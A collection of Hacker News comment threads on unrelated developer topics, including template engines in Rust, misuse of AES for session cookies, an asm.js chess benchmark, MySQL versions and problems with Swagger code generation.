------
trungonnews
So the code we write is clean and easy to understand, but the debugger only
works with the compiled version of the code?
In other words: write in C, and debug in assembly...
------
starwed
There's a bug in huntMen. _if (! is_vamp)_ should instead be _if (
is_vamp)_... :P
------
tjholowaychuk
why not just use node-fibers?
~~~
maxtaco
A key advantage of fibers of course is that they preserve exception semantics,
whereas tame can't in all cases. I'm not too interested in reviving the
stalemated thread v. event religious war. I prefer explicitly-managed events,
but if others prefer a more thread-like API, by all means....
~~~
jrockway
In the end, both are the same thing; managing action-specific state in an
application-defined per-action data structure. With OS threads, you let the OS
manage the state instead. This can be inefficient with a large number of
actions, because most of the state kept has nothing to do with the application
itself; it's OS bookkeeping overhead.
------
diamondhead
For those looking for the plain JavaScript version of the examples;
<https://gist.github.com/1090228>
Introducing Tera, a template engine in Rust - adamnemecek
https://blog.wearewizards.io/introducing-tera-a-template-engine-in-rust
======
the_mitsuhiko
As someone who spent way too much time building Django inspired template
engines (Jinja, Jinja2, Twig, etc.) I must say this is really cool and very
close to what I wanted to build myself for Rust but did not have the time.
> Tera uses serde which means that in the example above
Very good. But serde needs to get stable :(
> beautiful html output out of the box (ie no need for the {{- tags)
This is a request that comes up often but I tested this so much and always
came back to not doing magic. It breaks too many applications in unintended
ways (particularly plain text output).
> able to register new tags easily like the {% url ... %} in Django
I would not do that again. Jinja has an extension interface and I regret
adding it. I much rather have people just expose functions to the templates.
That said, in Rust that might be not a good idea because there are no keyword
arguments so make it makes sense there.
> no macros or other complex logic in the template […] include partial
> templates
Another thing I strongly disagree with but I can see the motivation. Macros in
Jinja I prefer so much over includes because it becomes clear what values
exist. Includes become really messy unless you are very organized. Macros
(which are just functions) accept the parameters and it becomes clear what the
thing does. Just look at that macro as an example:
[https://github.com/pallets/website/blob/master/templates/mac...](https://github.com/pallets/website/blob/master/templates/macros/navigation.html)
It's absolutely clear what it accepts as parameters. If that was a partial
include the "caller" needs to set up the variables appropriately and there is
no clear documentation on what the template wants etc.
But awesome to see this happen for Rust!
~~~
Keats
> Very good. But serde needs to get stable :(
I agree :(
> This is a request that comes up often but I tested this so much and always
> came back to not doing magic. It breaks too many applications in unintended
> ways (particularly plain text output).
That was even the first feature request I got. I don't think I'll go more into
magic than what it currently is, seems to be okay-ish
> I would not do that again. Jinja has an extension interface and I regret
> adding it. I'd much rather have people just expose functions to the
> templates. That said, in Rust that might not be a good idea because there
> are no keyword arguments, so maybe it makes sense there.
That was my first thought on a better way to do template tags but not sure how
to do that in Rust. If anyone has an idea, there's
[https://github.com/Keats/tera/issues/23](https://github.com/Keats/tera/issues/23)
now
Good point about macros, maybe I can have a look later. Macros and includes
feel like they fill the same spot in my mind in terms of features, so I'd
rather not have both.
~~~
lomnakkus
> Good point about macros, maybe I can have a look later. Macros and include
> feel like they fill the same spot in my mind in terms of features so I'd
> rather not have both.
You could always repurpose includes as _imports_ , i.e. not generate any
output from imports, but to allow their use as purely an organizational tool
for importing macros.
------
Pxtl
I've been expermenting with Mustache under the hood lately, so I'm interested
in template implementations. It seems odd, you've chosen an odd middle-ground
of "support arithmetic" and "no real heavy logic".
Having played with the subject a few times, I've come to the general feeling
that it's best to choose a hard line on one side or the other - either the
mustache "pure logicless" or just do straight string interpolation (assuming
the language provides a good syntax for multi-line string interpolation - C#
_almost_ does except that you have to escape all your quotes. Dunno if other
languages to better).
Any particular reason why you chose to support _some_ logic instead of none or
all?
~~~
JBReefer
Do you know if the quote escape is still required with C# 6 interpolation?
~~~
Pxtl
C#6 string interpolation is glorious, but if you use the multiline
var myString = $@"
Hey, string interpolation is nifty.
Look ma, no { this.Hands.ToString().ToUpper() }
More text.
But this is a ""quote"". It's ""ugly"" isn't it?
";
As you can see, you need to double your double quotes to escape them. Almost
perfect. You can even nest string interpolations to do neat template stuff
with functional-programming loops and whatnot.
~~~
virtualwhys
Scala seems to do what you want:
val str = s"""
Tripe quoted string interpolation
Allows for $variables and ${method.foo(bar)}
Mixed with "quotes"
"""
Can also use double quoted string interpolation for inline/one-liners where
embedded quotes above aren't needed.
~~~
Pxtl
Neat! With facilities like that, I'd be tempted to skip templating libraries
altogether and just have a normal interface for templates and use the regular
string expressions... unless I needed them internationalized, and that's where
Mustache shines, IMHO.
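For reference, JavaScript's template literals (ES2015, so newer than most of
this thread) get close to the Scala version: backtick strings are multiline,
interpolate with ${...}, and embedded quotes need no escaping. A sketch of
the "skip the templating library" idea, where a template is just a function:

```javascript
// A "template" is nothing more than a function returning a string.
const page = ({ title, items }) => `
  <h1>${title}</h1>
  <ul>
    ${items.map((it) => `<li>"${it}"</li>`).join("\n    ")}
  </ul>
`;

const html = page({ title: "Hello", items: ["one", "two"] });
```

No escaping is done here; real use would HTML-escape the values, and the
caveat about internationalization still applies.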
------
acjohnson55
After using many templating systems over the years, I'm sold on the opposite
approach of embedding (a description of) the output language in the host
language, rather than trying to embed logic in the output language. Think
React or Scalatags. Logic becomes trivial, because it's the logic of the host
language. And the output can be the output language, directly, or some other
data structure (VDOM, in the case of React).
It's similar to the concept of the free monad [1].
[1] [http://underscore.io/blog/posts/2015/04/14/free-monads-
are-s...](http://underscore.io/blog/posts/2015/04/14/free-monads-are-
simple.html)
------
nikolay
Clean, meaningful syntax! Great job!
Edit: Why spread the ugliness of "endif" and "endblock"? Why not just "end"?
Why have the unnatural "elif" as well?
~~~
the_mitsuhiko
> Edit: Why spread the ugliness of "endif" and "endblock"? Why not just "end"?
> Why have the unnatural "elif" as well?
Not the developer but I did not remove endif for twig or jinja either coming
from Django. Reasons for it: it becomes a lot more readable in the templates
and it avoids lots of debug headache due to accidentally deleting things. It's
already hard enough to debug template code sometimes but this way at least
it's very quickly clear what the problem is.
What would you use instead of elif? `{% else if %}` is in no way nicer than
`{% elif %}`. I picked `elif` in Jinja because it's what Python uses and
that's where Jinja is at home.
~~~
Keats
I was about to reply exactly that, thanks!
~~~
nikolay
You have to indent anyway. Then "endblock" becomes redundant. Also, you can't
have a blank "{% elif %}" - it needs to be followed by a condition. I think a
more natural and English-like syntax beats having to memorize deviations.
------
bfrog
Why add the requirement of naming the end tags? Seems like a relatively small
change, except if you're trying to re-use templates everywhere
~~~
Keats
Just for the sake of readability. At a previous job we had pretty huge
templates and I would forget the name of the block by the time I reached the
end
~~~
nikolay
Give people an option. I prefer "end" - make "endblock" work like "end", but
check nesting.
If You're Typing The Letters A-E-S Into Your Code, You're Doing It Wrong - jeffreyg
http://chargen.matasano.com/chargen/2009/7/22/if-youre-typing-the-letters-a-e-s-into-your-code-youre-doing.html
======
cpach
Older HN thread for this article: <http://news.ycombinator.com/item?id=639647>
------
cperciva
I am a proud member of the doing-it-wrong society.
~~~
tptacek
And you deserve every picodollar you earn for doing it that way, Colin.
~~~
cperciva
Hey, it's a _lot_ of picodollars!
~~~
tptacek
Five hundred billion of those will buy you a cup of coffee, won't it? I think
you should call this the Zimbabwe Pricing Plan.
~~~
spicyj
Fifty cents buys a cup of coffee?
------
jqueryin
I would have much preferred if the post wasn't acted out as a narrative as it
detracted from the powerful message of not using AES and why it's flawed.
~~~
JimmyL
My takeaway from the article wasn't "don't use AES" - it was "use a
sufficiently high-level cryptography library such that someone smarter than
you is deciding which algorithm to use and with which options".
~~~
joe_the_user
Yes,
But it seems like the situation they describe is one where you wouldn't want
to use encryption _at all_. Why give the user his data in an encrypted form
when you can give the user an ID and keep his data entirely away from him?
Seriously, when does giving someone data you don't want them to read _ever_
work better than just not giving them data at all?
~~~
NateLawson
I agree. That's why "keep the data on the server" is preferable to "send it to
the user but protect it with custom crypto".
~~~
joe_the_user
Yes,
Having a narrative reinforces the point that what you actually do depends on
the entire context of the application. You would almost never be the one
implementing cannot-be-broken-under-ANY-circumstances encryption. So you have
to know what the circumstances are. In this case, the circumstances point to
no-encryption-whatsoever!
Sure, you could point to other circumstances where something like what they're
talking about _would_ be useful but that's a million possible circumstances
with a million possible encryption solutions and you've lost the useful
urgency of the original concrete narrative.
------
joe_the_user
I love the narrative account. Making a point dramatically is great, and a
pseudo-mystery story is a great way to talk about encryption.
The narrative is right that AES is a wrong solution.
_But really, any encryption at all is a wrong, bass-ackwards solution to
keeping the user from modifying their account information._
information server-side is much better.
I mean, consider any scenario where you pass the user data you'll later use.
Will you not keep track of that data yourself but expect that the user's
encrypted cookie will do it for you? This is one way of simulating
statefulness in the stateless http protocol, but it's clearly an inferior,
dumbshit way of doing it, and it doesn't matter what encryption you use for the
purpose. Giving someone encrypted information they can't use is essentially
analogous to copy-protection and similar unwinnable scenarios whereas the
unique id approach is pretty much the standard and works well for many, many
apps of all sorts.
Having unique user-ids and user-information is only costly in terms of
accessing the information. But there isn't a point where decrypting
information coming from the user becomes less costly than getting it from the
database. Indeed, the higher the traffic, the more different brute-force
attacks make sense.
------
bartl
If the idea of the article was to make me feel inadequate, it did a remarkably
good job.
~~~
NateLawson
I don't think that was the goal. This whole crusade is just to get people to
realize the true cost of getting crypto right. It costs time and money to
build a resilient protocol. How many person-hours went into the AES
competition? What was the proportion of time spent on creating the algorithms
versus analyzing them?
In crypto, review costs much more than design. If you understand that tradeoff
and the benefits of your own design are worth spending this effort on,
congratulations, you are Qualcomm, Netscape, or Intel. All of these companies
had staff cryptographers.
More likely, your problem is close enough to other problems that you don't
need to spend the time or money to DIY. If that path is available, take it!
------
jrussbowman
Ok, granted I'm new here, and could be missing the point. I didn't actually
go through the full article because I'm not really that much into crypto, and
really, didn't the guy fail the interview at the point where he suggested that
encryption was the answer for a cookie used for individual identification? I
mean, encrypt it all you want, if I can be behind the same NAT as you, and
spoof your user agent, all I need to do is get that cookie and put it in my
browser, and I've stolen that session.
The real answer is you need to either encrypt the transport, or at the very
least minimize the amount of time that cookie is valid for.
~~~
mrcharles
The real answer is that you sound like you'd benefit from reading the whole
damn article.
~~~
jrussbowman
Well, I read the entire article, and it's quite interesting that there are
things like Keyczar and cryptlib out there, but I still think it's a poor example.
Other than a brief note that encryption does not equal authentication, they
never touched on the fact that encrypting the cookie data itself isn't a real
solution, as the encrypted cookie can be sniffed, and replayed to the server.
So, while a standard user can't hack their own cookie for escalation, they can
sniff admin cookies to get that escalation. If the cookie is used for
authentication or authorization, encrypting its content is providing a false
sense of security, no matter what nifty library you choose or not choose to do
it with.
~~~
zmimon
> as the encrypted cookie can be sniffed, and replayed to the server
I think the whole article is premised on requiring a level of security that
would presume TLS is being used.
~~~
NateLawson
Yes, the focus is on preventing cookie forgery for pre-auth account compromise
or privilege escalation.
------
tibbon
Anyone got a TL;DR version?
Basically encryption isn't authentication?
~~~
sapphirecat
1: Encryption isn't magic pixie dust: people can tamper with the ciphertext
and fool you. Sometimes they can even mess with the padding and decrypt the
entire message.
2: A rule of thumb that falls out of this: never try to decrypt ciphertext
that you can't verify is authentic. Consequence: compute the MAC over the
ciphertext, not the plaintext, so you don't have to decrypt to check the MAC.
I've done my message format in the past as "{version}{hmac-md5}{ciphertext}".
This is suitably secure, to the best of my knowledge. And thanks to the
version, it lets me alter the algorithms or keys without service disruption.
Once all sessions using it would be expired, the old version can be assumed to
be expired.
~~~
NateLawson
If the version is not covered by the HMAC, you may be subject to rollback
attacks. Compare the SSLv2 and v3 protocols to see what was done to address
this.
Really, it's very easy to make a mistake.
~~~
sapphirecat
I'm sorry, I don't get it. For session cookies, the client cannot do any
validation of the cookie, so it's a completely different domain.
Also, unlike session cookies, SSLv2 never had a hard expiration date after
which it could be unconditionally rejected.
However, I did just realize that for perfect security, there must be a service
disruption on change of version. Otherwise you may be upgrading an attacker's
forged v1 cookie to v2, if they submit a request before the v1 expiration.
~~~
NateLawson
Upgrading cookies is a bad idea. Revoking them and requiring reauthentication
is better. See the talk I gave at Google on web crypto where I talk about
exactly that situation.
[http://rdist.root.org/2009/08/06/google-tech-talk-on-
common-...](http://rdist.root.org/2009/08/06/google-tech-talk-on-common-
crypto-flaws/)
Your last paragraph shows you now have better understanding of this.
------
lr
My answer: I'd implement a real SSO solution, like CAS:
<http://www.jasig.org/cas> \-- Open Source, started at Yale, and supported by
an amazing team of people.
------
aschobel
We use the AES cipher for user authentication, we use the Rijndael variant
since we want 192-bit block size.
Our userIds are 64-bit with a 128-bit secret.
We generate the authentication cookie as follows:
Rijndael(64-bit userId + 128-bit secret, 192-bit key) = 192-bits of cipher
text
If you tamper with the cipher text the 128-bit secret won't be the same.
I don't see a practical cipher text tampering attack against this scheme.
There are authorization issues like how do you expire a specific user login.
~~~
NateLawson
This is a great example of warning signs. Note the number of times sizes
(bits) and algorithm (AES/Rijndael) are mentioned. Note the lack of clarity in
the specification (is "+" addition, XOR, or concatenation?) Note the overly-
large UID space which has nothing to do with security (will you really have
more than 4 billion users?)
Now look at how useful this design is. You've created a single-purpose
authenticator that just says "someone at some point in time has seen this
exact UID/authenticator pair". All other features (expiration, privileges,
source of the authenticator, version, system name the UID is for) are left
out.
Maybe it's "secure", but it doesn't do anything.
~~~
fasthead
And your post, sire, is a great example of not understanding the intent of
security. There's always a tradeoff between the requirement on the level of
security and cost in implementing it. Security is a matter of tradeoff.
Even with your proposed solution, there are still security breaches. How does
your solution handle the situation where someone hijacks the user's machine
and uses his browser session? How does your solution handle the case of
keylogger stealing the user's userid/password and start a valid session?
See there are always ways to make any security solution fall short. The
security is always a balance between a number of competing goals. If the
solution satisfies the requirement, it's a sound solution.
~~~
NateLawson
I don't understand how you get "computers are insecure" from "Arbitrary-
MAC(UID) is not a useful protocol".
------
achille
Why encrypt the cookie at all? Why not just have server1 sign it and have
server2 verify server1's signature?
~~~
NateLawson
The point of the article is that some people use encryption to try to achieve
authentication, which doesn't work. You're right. Signatures are appropriate
for providing authentication. HMAC is a form of symmetric authentication.
------
hga
Heh; an illustration that the real art here is in cryptographic protocols, not
crypto black boxes like AES (well, as long as your "random" numbers are random
enough, which turns out to be an issue in the VPS world).
I was lucky enough to learn this in 1979 while in a group trying to puzzle out
how to make an authentication system based on public keys (I've read they
didn't get it right until the mid-80s).
Final note: these protocols are _fragile_. If e.g. Microsoft implements
Kerberos but changes one little thing without explanation, let alone a serious
and public security review, _don't trust it_!!!
\- Harold, a proud member of the Do It Right Society.
~~~
cperciva
_an authentication system based on public keys (I've read they didn't get it
right until the mid-80s)._
Make that mid-90s. How to do public key signatures wasn't really settled until
Bellare and Rogaway published PSS at Eurocrypt 96.
~~~
hga
Sorry, I wasn't clear/precise, I meant an "authentication server" type
protocol/system, e.g. like Kerberos.
| {
"pile_set_name": "HackerNews"
} |
The Top 10 Daily Consequences of Having Evolved - closure
http://www.smithsonianmag.com/science-nature/The-Top-Ten-Daily-Consequences-of-Having-Evolved.html?device=android&c=y
======
djacobs
But every so often, our mitochondria and their
surrounding cells fight. The result is diseases,
such as mitochondrial myopathies (a range of muscle
diseases) or Leigh’s disease (which affects the
central nervous system).
It's not clear to me that mitochondria are fighting their host cells in a
myopathy. They simply aren't working because of genetic mutation. Even if we
do say they are "fighting", it's not obvious why that is a result of them
originating from two different cells.
------
Morendil
Bizarrely the article makes no mention at all of the various cognitive
consequences of our evolutionary history, such as confirmation bias, which
certainly have more impact on our lives on a daily basis than do hiccups. (I
get hiccups maybe once a month or so, brainfarts several times a day.)
------
carbocation
What is this linkbait tripe doing in my HackerNews? Flagged.
~~~
theBobMcCormick
What makes it tripe? Seems like interesting bio-trivia to me? And from the
Smithsonian of all places, it's definitely got some authority behind it.
------
exit
the most consequential aspect of being an evolved system is our obsessive
attachment to survival in spite of the tremendous suffering we endure.
------
eru
"Monkeys suffer the same fate only rarely, but then again they can’t sing or
dance. Then again, neither can I."
| {
"pile_set_name": "HackerNews"
} |
Asm.js Chess Battle - fishtoaster
https://dev.windows.com/en-us/microsoft-edge/testdrive/demos/chess/
======
bsimpson
The code they are benchmarking is written in C, then compiled to asm.js
(presumably with Emscripten). In one version, they remove the "use asm"
header, but the code appears identical.
That seems like a strange test. They aren't testing JS against ASM, or even
compiled-to-vanilla-JS vs compiled-to-ASM. Both versions are compiled to ASM
(complete with all strange annotations like num|0), only one has the asm
optimizations disabled. I don't know enough about asm to know if their
annotations are slower than vanilla JS in unoptimized engines, but I suspect
they might be.
I was also surprised that asm still won in Chrome - I thought Chrome optimized
for asm-like code without checking for the "use asm" flag.
~~~
azakai
> I don't know enough about asm to know if their annotations are slower than
> vanilla JS in unoptimized engines, but I suspect they might be.
The opposite is true, for the most part. JS engines, even without asm.js
optimizations, utilize the fact that the | operator emits a 32-bit integer
(per the JS semantics), so it helps their type inference.
(The engine needs to be good enough to get rid of the actual 0 value in the |0
coercions, but JS engines have been that good for several years now anyhow.)
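For the curious, a tiny runnable sketch of that coercion (my own example, not from any Emscripten output):

```javascript
// The |0 coercion: per JS semantics, bitwise-or converts its operand to a
// 32-bit signed integer, so engines can infer an int type for the result.
function toInt32(x) {
  return x | 0;
}

toInt32(3.7);          // truncates toward zero -> 3
toInt32(-3.7);         // -> -3
toInt32(2147483648);   // wraps around the 32-bit signed range -> -2147483648
```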
> I was also surprised that asm still won in Chrome - I thought Chrome
> optimized for asm-like code without checking for the "use asm" flag.
Chrome detects "use asm", and enables TurboFan on such code. All JS engines
today detect "use asm", except for JavaScriptCore.
------
mdergosits
> Refresh page to play again
This was very infuriating. The server seemed to be under load and took several
minutes to load. I was not going to wait for it load again to retry the
simulation.
~~~
arasmussen
Seriously. Came here to say this. How hard is it to add a button that says
"play another".
~~~
libria
FWIW, I put this in console so I could click the banner at the end to start
over:
    $('#chess__board-message').click(function() {
      var m = new ChessDemo.Match();
      m.$boardOverlay.hide();
      m.startNextTurn();
    });
------
billforsternz
Interesting. I slowed a game down to 1000ms per move so I could realistically
follow what was going on. The game started 1.Nf3 Nf6 2.e4?
So White sacrifices (loses?) a pawn for no compensation on move 2. Not really
sure what this says in respect of the experiment in general, but it does smell
a little.
Also; Showing the dark squares would be a massive usability advance! And it
would be nice if they respected some simple and fundamental chess conventions
(for example presenting the moves in the way I did in my comment above - move
numbers increment after whole moves not half moves)
~~~
chaddeshon
It's almost certainly playing out of an opening book.
There is a move history, but you have to expand it.
~~~
asdfologist
How does playing out of an opening book explain the opening blunder 2. e4?
~~~
danielbarla
Well, I guess if it really was out of a book, it would imply that the quality
of the engine itself wasn't at fault, but rather a bad opening book. Also,
without that line being thoroughly researched, it'd be difficult to say
whether it's a blunder, or a clever sacrifice. Again, it could be an
incomplete opening book which led the engine to offer the sacrifice, but then
didn't have info on how to capitalise on it.
Though in this case, I think it's almost certainly a blunder, that line does
not appear to be a well known opening.
~~~
V-2
There are opening books, and there are opening books. 1. Nf3 Nf6 2. e4 can no
doubt be found in some opening books due to the sheer fact that someone,
somewhere, played it, and it got archived. Then yes it's a line that could get
selected at random.
It's not a serious opening though, it looks frivolous - could be played in
simultaneous games, or in bullet chess for its surprise value etc.
If you optimize the opening book to include serious games only, you're
unlikely to come across this line.
[http://www.chessgames.com/perl/explorer?node=98&move=2&moves...](http://www.chessgames.com/perl/explorer?node=98&move=2&moves=Nf3.Nf6&nodes=74.98)
Given the insane amount of opening theory research humanity has done by now,
if e4 on the third move here was even remotely close to a clever sacrifice,
chess community would have noted it by now.
------
bratsche
I set it to as slow as it could go so I could watch the game. It was weird
because it got to a point where it declared a draw, but the pieces were still
moving around so I left it alone. Eventually a couple more pieces were
captured and the non-optimized side managed to win, so it updated from "draw"
to "checkmate".
------
TazeTSchnitzel
Interestingly, asm.js has an advantage in Firefox and Chrome for me, but not
in Safari.
~~~
cjbprime
Safari doesn't implement an asm.js backend, presumably?
~~~
TazeTSchnitzel
Nor does Chrome, but I think Chrome takes the `"use asm";` as a hint to use
certain optimisations.
~~~
brendandahl
Chrome should enable TurboFan with "use asm" set. Though the only
confirmation of this is saying it's tested in beta.
[https://code.google.com/p/v8/issues/detail?id=2599#c77](https://code.google.com/p/v8/issues/detail?id=2599#c77)
~~~
azakai
It's in release Chrome currently.
------
mzaccari
Link to source:
[https://github.com/MicrosoftEdge/Demos/tree/master/chess](https://github.com/MicrosoftEdge/Demos/tree/master/chess)
------
pacomerh
So does this mean that asm.js is good for longer operations? Because I tried
reducing the think time and the engine lost.
~~~
akovaski
I think it rather means that the search time was short enough that neither
search tree got deep enough to form advantageous moves. (When I check the
detailed output, it seems that the asm.js version visits at least 2x as many
nodes as the un-optimized version, independent of Time-per-turn)
------
rusbus
An interesting tidbit (chrome):
When you push it up to 1000ms per move, since the difference between 15 moves
ahead and 16 moves ahead is so large, both engines end up making 15 moves
ahead and win / lose about half the time, even though asm.js is visiting more
nodes.
~~~
dclowd9901
I noticed the same behavior by hobbling their time down to 10ms for each.
------
groupmonoid
At high level chess (which this is), white has a significant advantage over
black. Always picking asm.js as white (and not providing a setting to change
it) is a bit disingenuous.
~~~
vincentkriek
I don't know if it's updated but here asm.js is the black (or blue) player.
------
stuaxo
Ran it in chrome and it came out to a draw.
~~~
iopq
Of course, even a chess engine that is stronger will sometimes draw or lose to
a weaker one.
------
stop1234
"Checkmate! The non-optimized JavaScript wins!"
That's funny.
| {
"pile_set_name": "HackerNews"
} |
Why Are Our Most Important Teachers Paid the Least? - artsandsci
https://www.nytimes.com/2018/01/09/magazine/why-are-our-most-important-teachers-paid-the-least.html
======
jhokanson
Does anyone know what the tuition is for the Abbott preschool program that is
mentioned in the article? My impression has always been that one of the
reasons that teachers get paid so little is that class sizes are relatively
small (e.g. 4 infants per teacher in NC). I personally think preschool
teachers are not paid enough but I'm curious how Abbott is able to pay their
teachers so much.
| {
"pile_set_name": "HackerNews"
} |
Inferring the mammal tree (2019) - dadt
http://vertlife.org/data/mammals/
======
JoeAltmaier
Very educational!
My takeaway: while primates have done very well (lots of branching; lots of
species), Wow Rats! Such detailed diversity!
------
adamc
Fascinating, but a little hard to use.
| {
"pile_set_name": "HackerNews"
} |
Which MySQL Version to Use, and Why? - napolux
http://deafbysalami.blogspot.it/2013/08/which-mysql-version-to-use-and-why.html
======
bsg75
Thankfully there are RDBMS engines where you can upgrade to a recent version
(not necessarily bleeding edge and after appropriate testing), gain feature
and performance improvements, without the apparent fear of the unknown the
author has. Stability and age are not always tied to each other in software.
If the mindset in this article is any example of how DBAs responsible for
MySQL must think to survive, then it is no surprise why so many other bad
choices in data storage are made in an attempt to avoid SQL/RDBMS - when what
needs to be avoided is MySQL.
| {
"pile_set_name": "HackerNews"
} |
What I want in a code review tool - zekenie
GitHub PRs can sometimes be a clumsy tool for code review. What I want in CR software that I can't find:<p>- file by file approval (reviewer approves once, it's out of the diff)
- filter files by glob string (I want to look at all the models right now)
- state management of requests (you've completed 2 reviewer requests, responded to 4, etc)
======
piotrkaminski
Reviewable does 2 out of these 3 IIUC (no globs yet) and integrates with
GitHub PRs. Might want to take a look. (Disclaimer: I built it.)
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Getting started with Programming for Cloud Storage - sthustfo
As you all know, "cloud storage and management" of data is now one of the basic necessities for any application these days. Be it the media streaming, critical business data or the medical records of patients - basically enabling portable data. However I have no knowledge at all about the programming aspect of the cloud storage. Hence I need advice and suggestions on how to go about learning about the basics as well as programming aspect of cloud storage.<p>I have close to 10 years programming experience mostly in telecom and networking in general and protocols, mobile and VoIP to be specific. I am very proficient in C, a bit of C++ and perl. I have learnt ruby and tried my hand with RoR.
======
hrasm
\- Sign up for Amazon Cloud Services. It is free for a year. (this might have
changed...check at the Amazon website)
\- Go through their tutorials and/or peruse the forums for Ruby code snippets.
\- Start slow by getting rudimentary code working in your environment and
accelerate from there.
------
gspyrou
You may check this presentation from PDC10 for Windows Azure Storage
<http://channel9.msdn.com/Events/PDC/PDC10/CS11>
| {
"pile_set_name": "HackerNews"
} |
Why do corporations speak the way they do? - danielnixon
https://www.thecut.com/2020/02/spread-of-corporate-speak.html
======
robocat
Dupe? from [https://www.vulture.com/2020/02/spread-of-corporate-
speak.ht...](https://www.vulture.com/2020/02/spread-of-corporate-speak.html)
| {
"pile_set_name": "HackerNews"
} |
Problems with Swagger - senand
http://blog.novatec-gmbh.de/the-problems-with-swagger/
======
gkoberger
My problem with Swagger is almost the opposite... it solves the problem (APIs
are very complicated to use!) by embracing this complexity with more
complexity and more tools. Rather, I believe the solution is a push to just
have simpler APIs.
It's crazy to me that it's harder to write a Swagger file than it is to write
the API itself. And there's a lot of tooling that benefits from Swagger,
but... I've found they all work 80%. Codegen, documentation, etc get 80% of
the way there.
(Also, OAS 3 has linking, which is very similar to your hypermedia complaint)
~~~
mcescalante
I had these same issues. It took me considerably more time and effort to write
a Swagger spec and get the UI to actually behave than it did to write my
entire API and some simple docs in markdown.
I also tried out the "codegen" and a few other projects that generate
boilerplate from a spec (for Python) - the code it generated was frustrating,
lengthy, and much more complex than the simple endpoints that I quickly wrote
from scratch.
~~~
eropple
_> It took me considerably more time and effort to write a Swagger spec and
get the UI to actually behave than it did to write my entire API and some
simple docs in markdown._
How long did it take to write API consumer libraries in twenty languages and
update every one on API change?
If you don't care about that, then Swagger isn't a good idea for you. But I'd
think really hard about whether you _should_ care about it if you think you
don't.
_> the code it generated was frustrating, lengthy, and much more complex than
the simple endpoints that I quickly wrote from scratch_
Sure--but you didn't have to write it.
~~~
pbreit
Is whatever value people are getting out of client libraries provided by
something generic like [http://unirest.io](http://unirest.io) ?
When does it make sense to issue API-specific client libraries for a plain ole
RESTful API?
~~~
eropple
_> When does it make sense to issue API-specific client libraries for a plain
ole RESTful API?_
Any time you have a statically-typed language consuming you. Having to write
my own Jackson declarations to pull in your API to a JVM project or my own
DataContract barf for a CLR one is a quick way to make me hate you, and me
hating you means I'm already looking for an alternative that isn't you that
gets out of my way.
~~~
pbreit
I sort of thought the opposite, that the client libraries are what is getting
in the way.
~~~
eropple
So you enjoy writing a bunch of boilerplate class files that are manual
translations of somebody else's doc?
~~~
pbreit
No, I just like to get started coding API calls.
------
mr_tristan
I've found swagger codegen to be really, really inconsistent between different
implementations. A few of them - I recall we had a team using Qt - didn't even
generate compilable code. When I looked into the infrastructure of the codegen
project, I found... mustache.
Check it out yourself: [https://github.com/swagger-api/swagger-
codegen/tree/master/m...](https://github.com/swagger-api/swagger-
codegen/tree/master/modules/swagger-codegen/src/main/resources)
Mustache is fine for doing a little view rendering, but for language
generation... it's really obnoxious to use. Say you want to customize the
output. Well, now you're basically replacing one of those magic .mustache
files. And what's the model you use to generate those mustache files? Well,
you got to look through the codebase for that.
I ended up just not using swagger-codegen, and created my own StringTemplate
based system, which got the job done a lot faster. The swagger core model was
really janky to build logic around, however, so this system was really
implementation specific.
In the end, were I to do it all over again, I would have probably just built a
different mechanism. And honestly, building your own damn little DSL and code
generators for your use case will probably be faster than integrating Swagger.
_Especially_ if you do not use the JVM as part of your existing toolchain.
I've not found anything to support multiple languages easily. If I were to do
something today, I'd probably create a custom API DSL, custom code generators,
with an output for asciidoctor (which is awesome) and example and test
projects that test the generated code. Once you get the pipeline going the
work is pretty straightforward.
~~~
wing328hk
> I've found swagger codegen to be really, really inconsistent between
> different implementations. A few of them - I recall we had a team using Qt -
> didn't even generate compilable code. When I looked into the infrastructure
> of the codegen project, I found... mustache.
Yup, some generators (e.g. ActionScript, Qt5 C++) are less mature than the
others (e.g. Ruby, PHP, C#). For the issues with Qt5 C++ generator, please
open an issue via [http://github.com/swagger-api/swagger-
codegen/issues/new](http://github.com/swagger-api/swagger-codegen/issues/new)
so that the community can help work on it.
> Mustache is fine for doing a little view rendering, but for language
> generation... it's really obnoxious to use. Say you want to customize the
> output. Well, now you're basically replacing one of those magic .mustache
> files. And what's the model you use to generate those mustache files? Well,
> you got to look through the codebase for that.
Instead looking through the codebase, you may also want to try the debug flag
(e.g. debugOperations, debugModels) to get a list of tags available in the
mustache templates: [https://github.com/swagger-api/swagger-
codegen/wiki/FAQ#how-...](https://github.com/swagger-api/swagger-
codegen/wiki/FAQ#how-to-debug-swagger-codegen)
I agree that mustache may not be the best template system in the world but
it's easy to learn and developers seem pretty comfortable using it.
> Especially if you do not use the JVM as part of your existing toolchain.
One can also use docker ([https://github.com/swagger-api/swagger-
codegen#docker](https://github.com/swagger-api/swagger-codegen#docker)) or
[https://generator.swagger.io](https://generator.swagger.io)
([https://github.com/swagger-api/swagger-codegen#online-
genera...](https://github.com/swagger-api/swagger-codegen#online-generators))
to leverage Swagger Codegen without installing JVM.
Thanks for the feedback and I hope the above helps.
(Disclosure: I'm a top contributor to the project)
~~~
gregopet
Mustache is the most limiting (not to mention ugly) template language I've
seen in a long time. It allows no logic whatsoever and even writing simple if
statements is tedious. We have a Swagger spec from which we generate
Asciidoctor documentation via a Gradle plugin which works very nice, and
generate basic POJOs for Java and POCOs for C#. That... does not work very
well for our purposes.
We wanted to produce named enumerables by using custom extensions and found no
way of doing it with Mustache. It didn't help that our custom extension YAML
was passed into Mustache as serialized JSON. One of our developers took it
upon himself to make it work and ended up writing his own simple version of
the Codegen which works well enough for us. He tried modifying one of the
backends preparing data for Mustache but then said rewriting it on his own was
just simpler.
------
hjacobs
While Swagger might not be perfect (some pain points are addressed with
OpenAPI v3) it works IMHO pretty well for us (Zalando) and myself doing API
first:
* use a decent editor to write the YAML, e.g. [https://github.com/zalando/intellij-swagger](https://github.com/zalando/intellij-swagger)
* do not write any boilerplate code and do not generate code (if that's possible in your env), e.g. by using [https://github.com/zalando/connexion](https://github.com/zalando/connexion) (Python API-first)
* follow best practices and guidelines to have a consistent API experience, e.g. [https://zalando.github.io/restful-api-guidelines/](https://zalando.github.io/restful-api-guidelines/)
Most importantly Swagger/OpenAPI gives us a "simple" (everything is relative!)
language to define APIs and discuss/review them independent of languages as
teams use different ones across Zalando Tech.
~~~
cimi_
Easy is subjective, simple is objective. You probably meant easy ;)
------
Yhippa
I really like the idea of HATEOAS but I have never seen hypermedia controls
done in the wild across any companies I've worked for nor on any client
projects. I think it's very cool but a lot of development patterns don't
consider it.
~~~
richardwhiuk
